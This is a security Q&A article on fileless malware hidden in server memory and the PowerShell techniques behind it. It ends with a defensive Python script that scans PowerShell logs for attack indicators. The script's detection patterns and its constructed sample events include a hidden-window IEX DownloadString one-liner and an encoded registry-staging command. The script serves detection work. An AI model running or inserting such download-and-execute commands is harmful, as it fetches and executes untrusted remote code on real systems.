
What tools were used to hide fileless malware in server memory?

Fileless malware hidden in server memory led to attacks on many companies worldwide. Expert Nick Lewis explains how these attacks fit in with the wider fileless malware trend.

More than 140 banks, government organizations and telecommunications companies worldwide have been attacked with "fileless malware" hidden in server memory. What tools and techniques were used to carry out these attacks? Are these similar to the fileless malware attacks you wrote about last year?

One of the key aspects of any attack is getting the target system to take certain actions, or gaining access to its data, by executing code on that system. One of the earliest attack methods to gain widespread attention in the information security community was remote code execution via a vulnerability in a service or process running as an administrative user. This provided the initial access to a system so the next step in the attack could be taken, like installing a rootkit.

As enterprises began implementing security controls like firewalls, and server software became more resistant to remote code execution vulnerabilities, attackers adapted in order to keep gaining access to systems and data. Many remote code execution exploits relied on built-in executables in known locations to execute code on the target system. This is remarkably similar to how fileless attacks have developed, and the use of phishing has replaced remote code execution in many attacks. Attacks using remote code execution do, however, continue.

With the exception of physical attacks, an attack cannot be carried out without the ability to execute code on the endpoint. Even ransomware requires executing malicious code on the endpoint. The strict definition of fileless malware has changed over time and, as I wrote last year, there has been a rise in fileless malware. Lenny Zeltser, vice president of products at Minerva Labs and senior instructor at the SANS Institute, wrote about the history of fileless malware attacks, addressing the rise in use of the term and the fact that it is used to refer to a variety of attack methods.

The attack Kaspersky Lab's Global Research and Analysis Team wrote about uses PowerShell and built-in Windows commands to download Metasploit and take control of the endpoint. The attack relies on insecure PowerShell configurations that allow the endpoint to execute arbitrary PowerShell commands and store data in the registry, and it takes advantage of vulnerabilities on the endpoint, much like other fileless malware attacks. Enterprises should periodically check their servers' memory for any irregularities that may indicate a fileless malware attack.
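Because this style of attack leaves PowerShell activity rather than files behind, one practical check is to run triage over PowerShell script block log entries (Microsoft-Windows-PowerShell/Operational, event ID 4104) or process command lines and flag the combinations that characterize download-and-execute and registry-staging one-liners. The script below is an added example, not code from the article or from Kaspersky Lab; the indicator names, the `scan_events` threshold and the sample log lines are all constructed for illustration. It also decodes `-EncodedCommand` arguments the way PowerShell encodes them (base64 over UTF-16LE), so that indicators hidden inside an encoded payload are matched as well.

```python
"""Triage of PowerShell script block log entries for fileless-attack indicators.

Added example, not code from the article or from Kaspersky Lab. It assumes each
input line is the message text of a PowerShell script block logging event
(Microsoft-Windows-PowerShell/Operational, event ID 4104) or a process command
line; the sample lines below are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Indicator patterns typical of download-and-execute and registry-staging
# one-liners. Matching is case-insensitive because PowerShell is.
INDICATORS = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("base64_decode", re.compile(r"FromBase64String", re.I)),
    ("registry_write", re.compile(r"Set-ItemProperty|New-ItemProperty|\breg(?:\.exe)?\s+add\b", re.I)),
    ("hidden_or_bypass", re.compile(r"-w(?:indowstyle)?\s+hidden|-ex(?:ecutionpolicy)?\s+bypass|-nop\b|-noprofile\b", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    line_no: int
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or invalid.

    PowerShell base64-encodes this argument over UTF-16LE, not UTF-8; decoding
    it as UTF-8 yields interleaved NULs and hides the real command from matching.
    """
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_script_block(text: str) -> Tuple[List[str], Optional[str]]:
    """Match indicators against the raw line plus its decoded payload, if any."""
    decoded = decode_encoded_command(text)
    hits: List[str] = []
    if decoded is not None:
        hits.append("encoded_command")
    haystack = text if decoded is None else text + "\n" + decoded
    hits.extend(name for name, rx in INDICATORS if rx.search(haystack))
    return hits, decoded


def scan_events(lines: List[str], min_indicators: int = 2) -> List[Finding]:
    """Report lines with at least min_indicators hits. A single hit is often
    routine admin activity, so the threshold keeps the noise down."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits, decoded = analyze_script_block(line)
        if len(hits) >= min_indicators:
            findings.append(Finding(n, hits, decoded))
    return findings


def encode_powershell_argument(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects (UTF-16LE base64).
    Used here only to construct the sample event below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: two routine admin commands and two suspicious ones.
SAMPLE_EVENTS = [
    "Get-Service -Name Spooler | Restart-Service",
    "Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'",
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"",
    "powershell.exe -nop -enc " + encode_powershell_argument(
        "Set-ItemProperty -Path 'HKCU:\\Software\\DemoStage' -Name Blob -Value $payload"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {', '.join(f.indicators)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Run against the constructed sample, the two routine lines produce no finding, the download cradle is flagged on three indicators, and the encoded line is flagged only because the UTF-16LE payload was decoded first and found to write to the registry. The threshold of two indicators is a starting point, not a tuned rule; a production detection would be fed from the script block log rather than a list of strings and would add allow-listing for known administrative scripts.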


This was last published in July 2017
